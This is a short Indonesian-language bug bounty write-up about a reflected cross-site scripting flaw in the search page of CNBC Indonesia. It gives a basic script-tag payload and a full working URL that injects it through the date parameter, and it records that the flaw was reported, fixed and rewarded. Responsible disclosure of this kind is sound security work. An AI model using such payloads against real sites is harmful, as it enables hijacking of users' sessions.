XSS REFLECTED DI CNBC INDONESIA VIA SEARCH ENGINE PARAMETER
Hi, Bug Hunter & Teman-teman smua.
Di write up kali ini saya bakal membahas tentang XSS REFLECTED DI CNBC INDONESIA
Dikasus ini sih hanya memakai payload biasa saja kok :)
Tidak ada bypass payload juga :D tapi gapapa lah dan lagi gabut juga :D
Baik, langsung ke topik nya saja
Vuln XSS REFLECTED :
https://www.cnbcindonesia.com/search?query=hhh&kanal=&tipe=&date=
XSS REFLECTED berada di parameter /search?query=&kanal=&date=
Payload :
<script>prompt(1)</script>
Final :
https://www.cnbcindonesia.com/search?query=hhh&kanal=&tipe=foto&date=2020/11/09%22%3E%3Cscript%3Eprompt(document.domain)%3C/script%3E
Dan pop up muncul :D
Timeline :
Report : 12/11/2020
Fix : 29/12/2020
Rewards : 22/01/2021